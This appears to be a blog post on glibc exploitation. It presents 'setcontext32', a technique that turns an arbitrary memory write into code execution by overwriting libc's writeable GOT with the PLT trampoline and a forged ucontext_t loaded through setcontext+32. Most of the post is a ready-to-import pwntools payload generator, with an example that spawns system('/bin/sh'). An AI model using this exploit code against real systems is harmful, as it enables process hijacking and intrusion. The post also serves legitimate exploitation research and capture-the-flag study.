# modern arb write -> rce is hard Currently, converting an arbitrary write primitive into RCE is a messy process. The good old days of `__free_hook` are long gone; now you've got to leak the ptr mangling cookie to modify an existing `__exit_funcs` entry, maybe compute the offset to `ld.so` to overwrite `l_addr` and create a fake `DT_FINI` entry, or perhaps setup special `_codecvt` and `_wide_data` structures on hijacked IO objects... I'd just like to specify the function I want to call and its arguments! I want a *flexible* RCE primitive. I don't want to rely on `_IO_cleanup`, `_dl_fini`, or `malloc` to call my injected code. I want an inherently universal gadget, a gadget I can expect to be called with the most messed up heap bins and broken IO objects. I want to be able to call any function with any set of arguments without needing to stack pivot or pray `system` is stack aligned. I don't want to satisfy several constraints so `one_gadget` will work! # setcontext32 setcontext32 is a neat method to convert arbitrary write to flexible arbitrary code execution. Roughly, it looks like: ```python= write(libc_write_address, flat( p64(0), p64(libc_write_address + 0x218) p64(setcontext+32), p64(libc_exe_address) * 0x40, cpu_state_information, )) ``` Where `libc_write_address` is the start of the writeable page in libc, `libc_exe_address` is the start of the executable page in libc, and `cpu_state_information` is a structure that contains all current registers, including `rsp` and `rip`. ## high level overview Every GOT entry in libc such as `memset`, `memcpy`, `strcpy`, and `strlen` is replaced with the PLT trampoline, which starts at the beginning of the executable page. The PLT trampoline pushes a fake linkmap, `libc_write_address + 0x218`, and calls a fake runtime resolver, `setcontext+32`, all of which starts at the beginning of the writeable page. `setcontext+32` pops `libc_write_address + 0x218` off the stack, and treats it as a pointer to a saved `ucontext_t`. It'll then load your structure as the current CPU state. Calling most libc functions will trigger setcontext32, including `malloc`, `exit`, and (almost?) every IO operation. ## why libc's GOT is writeable so that you may use architecture specific functions, such as `memcpy` optimized for SSE or AVX512. A friend also guessed that it could be for `ltrace`. I learned the libc GOT was writeable from pwndbg creator [disconnect3d](https://twitter.com/disconnect3d_pl). ## code Here's code you can readily import to generate setcontext32 payloads (or integrate into your pwn libraries). An example is below. `setcontext32.py` ```python= from pwn import * def create_ucontext( src: int, rsp=0, rbx=0, rbp=0, r12=0, r13=0, r14=0, r15=0, rsi=0, rdi=0, rcx=0, r8=0, r9=0, rdx=0, rip=0xDEADBEEF, ) -> bytearray: b = bytearray(0x200) b[0xE0:0xE8] = p64(src) # fldenv ptr b[0x1C0:0x1C8] = p64(0x1F80) # ldmxcsr b[0xA0:0xA8] = p64(rsp) b[0x80:0x88] = p64(rbx) b[0x78:0x80] = p64(rbp) b[0x48:0x50] = p64(r12) b[0x50:0x58] = p64(r13) b[0x58:0x60] = p64(r14) b[0x60:0x68] = p64(r15) b[0xA8:0xB0] = p64(rip) # ret ptr b[0x70:0x78] = p64(rsi) b[0x68:0x70] = p64(rdi) b[0x98:0xA0] = p64(rcx) b[0x28:0x30] = p64(r8) b[0x30:0x38] = p64(r9) b[0x88:0x90] = p64(rdx) return b def setcontext32(libc: ELF, **kwargs) -> (int, bytes): got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT") plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr return got, flat( p64(0), p64(got + 0x218), p64(libc.symbols["setcontext"] + 32), p64(plt_trampoline) * 0x40, create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs), ) if __name__ == "__main__": libc = ELF("./libc.so.6") dest, payload = setcontext32.setcontext32( libc, rip=libc.sym["system"], rdi=libc.search(b"/bin/sh").__next__() ) print(hex(dest), payload.hex()) ```